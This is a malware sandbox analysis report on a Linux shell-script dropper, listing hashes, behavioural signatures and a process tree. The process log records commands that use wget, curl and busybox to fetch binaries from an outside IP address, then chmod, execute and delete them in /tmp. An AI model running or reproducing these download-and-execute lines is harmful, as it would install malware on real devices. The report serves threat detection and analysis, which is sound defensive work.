Analysis
max time kernel: 8s
max time network: 9s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 02:47
Static task static1
Behavioral task behavioral1: sample d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh, resource ubuntu1804-amd64-20240729-en
Behavioral task behavioral2: sample d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh, resource debian9-mipsel-20240226-en
General
Target: d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Size: 10KB
MD5: 60c5521dc77c48a75842ba0dbc3fae7c
SHA1: 9ddfd137b35be8207eb3889a9a93c23ce142e184
SHA256: d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
SHA512: da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
SSDEEP: 192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 8 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
758  chmod
666  chmod
677  chmod
683  chmod
697  chmod
711  chmod
726  chmod
744  chmod
Executes dropped EXE (8 IoCs)
ioc                                        pid  Process
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS    667  BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk    678  rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj    684  De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv    698  lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu    713  p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR    727  3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr    746  LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG    759  TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
Checks CPU configuration (1 TTPs, 8 IoCs)
Checks CPU information, which indicates whether the system is a virtual machine.
description               ioc            Process
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
File opened for reading   /proc/cpuinfo  curl
Reads runtime system information
description               ioc                             Process
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/self/auxv                 curl
File opened for reading   /proc/sys/crypto/fips_enabled   curl
Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
description                    ioc                                        Process
File opened for modification   /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj    curl
File opened for modification   /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv    curl
File opened for modification   /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu    curl
File opened for modification   /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR    curl
File opened for modification   /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr    curl
File opened for modification   /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG    curl
File opened for modification   /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS    curl
File opened for modification   /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk    curl
Processes
[PID 637] /tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
          cmd: /tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
    [PID 639] /bin/rm  cmd: /bin/rm bins.sh
    [PID 641] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
    [PID 653] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 662] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
    [PID 666] /bin/chmod  cmd: chmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
              signatures: File and Directory Permissions Modification
    [PID 667] /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS  cmd: ./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
              signatures: Executes dropped EXE
    [PID 668] /bin/rm  cmd: rm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS
    [PID 670] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
    [PID 674] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 676] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
    [PID 677] /bin/chmod  cmd: chmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
              signatures: File and Directory Permissions Modification
    [PID 678] /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk  cmd: ./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
              signatures: Executes dropped EXE
    [PID 679] /bin/rm  cmd: rm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk
    [PID 680] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
    [PID 681] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 682] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
    [PID 683] /bin/chmod  cmd: chmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
              signatures: File and Directory Permissions Modification
    [PID 684] /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj  cmd: ./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
              signatures: Executes dropped EXE
    [PID 685] /bin/rm  cmd: rm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj
    [PID 686] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
    [PID 689] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 694] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
    [PID 697] /bin/chmod  cmd: chmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
              signatures: File and Directory Permissions Modification
    [PID 698] /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv  cmd: ./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
              signatures: Executes dropped EXE
    [PID 699] /bin/rm  cmd: rm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv
    [PID 700] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
    [PID 704] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 708] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
    [PID 711] /bin/chmod  cmd: chmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
              signatures: File and Directory Permissions Modification
    [PID 713] /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu  cmd: ./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
              signatures: Executes dropped EXE
    [PID 714] /bin/rm  cmd: rm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu
    [PID 716] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
    [PID 719] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 723] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
    [PID 726] /bin/chmod  cmd: chmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
              signatures: File and Directory Permissions Modification
    [PID 727] /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR  cmd: ./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
              signatures: Executes dropped EXE
    [PID 729] /bin/rm  cmd: rm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR
    [PID 730] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
    [PID 733] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 740] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
    [PID 744] /bin/chmod  cmd: chmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
              signatures: File and Directory Permissions Modification
    [PID 746] /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr  cmd: ./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
              signatures: Executes dropped EXE
    [PID 747] /bin/rm  cmd: rm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr
    [PID 748] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
    [PID 752] /usr/bin/curl  cmd: curl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
              signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    [PID 757] /bin/busybox  cmd: /bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
    [PID 758] /bin/chmod  cmd: chmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
              signatures: File and Directory Permissions Modification
    [PID 759] /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG  cmd: ./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
              signatures: Executes dropped EXE
    [PID 760] /bin/rm  cmd: rm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG
    [PID 761] /usr/bin/wget  cmd: wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97